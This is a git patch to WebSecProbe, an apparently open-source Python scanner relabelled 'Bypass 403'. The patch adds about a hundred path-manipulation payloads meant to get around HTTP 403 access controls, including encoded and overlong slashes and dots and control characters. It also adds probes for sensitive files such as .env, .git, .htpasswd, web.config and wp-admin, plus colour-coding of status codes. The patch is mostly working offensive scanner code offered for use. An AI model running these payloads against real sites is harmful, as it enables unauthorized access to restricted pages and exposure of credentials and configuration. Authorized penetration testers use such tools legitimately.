From ef682fc6d21eee7966affefd4483366b2a420d7e Mon Sep 17 00:00:00 2001 From: Spyboy Date: Wed, 20 Mar 2024 06:31:24 +0530 Subject: [PATCH] more payloads --- WebSecProbe/main.py | 123 +++++++++++++++++++++++++++++++++++++++++--- setup.py | 4 +- 2 files changed, 118 insertions(+), 9 deletions(-) diff --git a/WebSecProbe/main.py b/WebSecProbe/main.py index 45f669b..c4171ee 100644 --- a/WebSecProbe/main.py +++ b/WebSecProbe/main.py @@ -1,5 +1,3 @@ -# websecprobe/websecprobe/cli.py - import argparse import requests import json @@ -27,8 +25,20 @@ def send_request(self, payload): full_url = f"{self.url}/{payload}" response = requests.get(full_url) # Remove verify=False to enable SSL certificate verification status_code = response.status_code + colored_code = self.color_status_code(status_code) # Added this line to colorize status codes content_length = len(response.content) - self.results.append([full_url, status_code, content_length]) + self.results.append([full_url, colored_code, content_length]) + + def color_status_code(self, code): + if code >= 200 and code < 300: + return f'\033[32m{code}\033[0m' # Green + elif code >= 300 and code < 400: + return f'\033[33m{code}\033[0m' # Yellow + elif code >= 400 and code < 500: + return f'\033[31m{code}\033[0m' # Red + else: + return f'\033[35m{code}\033[0m' # Magenta + def run(self): # Validate the URL @@ -65,7 +75,7 @@ def run(self): f"-H X-Host: {self.path}127.0.0.1", f"{self.path}..;/", f" {self.path};/", - f"{self.path}/path", #new payloads from here + f"{self.path}/path", f"{self.path}%2Fpath", f"{self.path}%252Fpath", f"{self.path}/path;parameter", @@ -74,7 +84,106 @@ def run(self): f"{self.path}%u002Fpath", f"{self.path}%252E", f"{self.path}%00{self.path}", - f"{self.path}/path%2Ehtml" + f"{self.path}/path%2Ehtml", + # New payloads + f"{self.path}/?", + f"{self.path}//", + f"{self.path}??", + f"{self.path}??/", + f"{self.path}..;", + f"{self.path}%23", + f"{self.path}%26", + f"{self.path}/~", + f"{self.path}/%7E", + f"{self.path}/%C0%AF", + f"{self.path}/%C0%AE", + f"{self.path}/%252E%252E/", + f"{self.path}/%252F", + f"{self.path}/%255C", + f"{self.path}%3f", + f"{self.path}%3F", + f"{self.path}/%252e/", + f"{self.path}/%252e%252e/", + f"{self.path}/%252f", + f"{self.path}/%2e/", + f"{self.path}/%2e%2e/", + f"{self.path}/%2f", + f"{self.path}/%09", + f"{self.path}/%09/", + f"{self.path}/%0A", + f"{self.path}/%0A/", + f"{self.path}/%0D", + f"{self.path}/%0D/", + f"{self.path}/%0C", + f"{self.path}/%0C/", + f"{self.path}/.json", + f"{self.path}/.json/", + f"{self.path}/.xml", + f"{self.path}/.xml/", + f"{self.path}/.html", + f"{self.path}/.html/", + f"{self.path}/.php", + f"{self.path}/.php/", + f"{self.path}/.asp", + f"{self.path}/.asp/", + f"{self.path}/.aspx", + f"{self.path}/.aspx/", + f"{self.path}/.cgi", + f"{self.path}/.cgi/", + f"{self.path}/.jsp", + f"{self.path}/.jsp/", + f"{self.path}/.exe", + f"{self.path}/.exe/", + f"{self.path}/.dll", + f"{self.path}/.dll/", + f"{self.path}/.bat", + f"{self.path}/.bat/", + f"{self.path}/.bin", + f"{self.path}/.bin/", + f"{self.path}/.phtml", + f"{self.path}/.phtml/", + f"{self.path}/.htaccess", + f"{self.path}/.htaccess/", + f"{self.path}/.htpasswd", + f"{self.path}/.htpasswd/", + f"{self.path}/web.config", + f"{self.path}/web.config/", + f"{self.path}/robots.txt", + f"{self.path}/robots.txt/", + f"{self.path}/admin", + f"{self.path}/admin/", + f"{self.path}/administrator", + f"{self.path}/administrator/", + f"{self.path}/login", + f"{self.path}/login/", + f"{self.path}/wp-admin", + f"{self.path}/wp-admin/", + f"{self.path}/wp-login", + f"{self.path}/wp-login/", + f"{self.path}/config", + f"{self.path}/config/", + f"{self.path}/.git", + f"{self.path}/.git/", + f"{self.path}/.svn", + f"{self.path}/.svn/", + f"{self.path}/.hg", + f"{self.path}/.hg/", + f"{self.path}/.bzr", + f"{self.path}/.bzr/", + f"{self.path}/test", + f"{self.path}/test/", + f"{self.path}/demo", + f"{self.path}/demo/", + f"{self.path}/backup", + f"{self.path}/backup/", + f"{self.path}/tmp", + f"{self.path}/tmp/", + f"{self.path}/temp", + f"{self.path}/temp/", + f"{self.path}/.env", + f"{self.path}/.env/", + f"{self.path}/.DS_Store", + f"{self.path}/.DS_Store/", ] for payload in payloads: @@ -121,7 +230,7 @@ def main(): blog = 'https://spyboy.blog/' github = 'https://github.com/spyboy-productions/WebSecProbe' - VERSION = '0.0.11' + VERSION = '0.0.12' R = '\033[31m' # red G = '\033[32m' # green @@ -162,4 +271,4 @@ def main(): probe.run() if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/setup.py b/setup.py index 381a5e1..9ebe5b1 100644 --- a/setup.py +++ b/setup.py @@ -7,8 +7,8 @@ with codecs.open(os.path.join(here, "README.md"), encoding="utf-8") as fh: long_description = "\n" + fh.read() -VERSION = '0.0.11' -DESCRIPTION = 'Web Security Assessment Tool' +VERSION = '0.0.12' +DESCRIPTION = 'Bypass 403' # Setting up setup(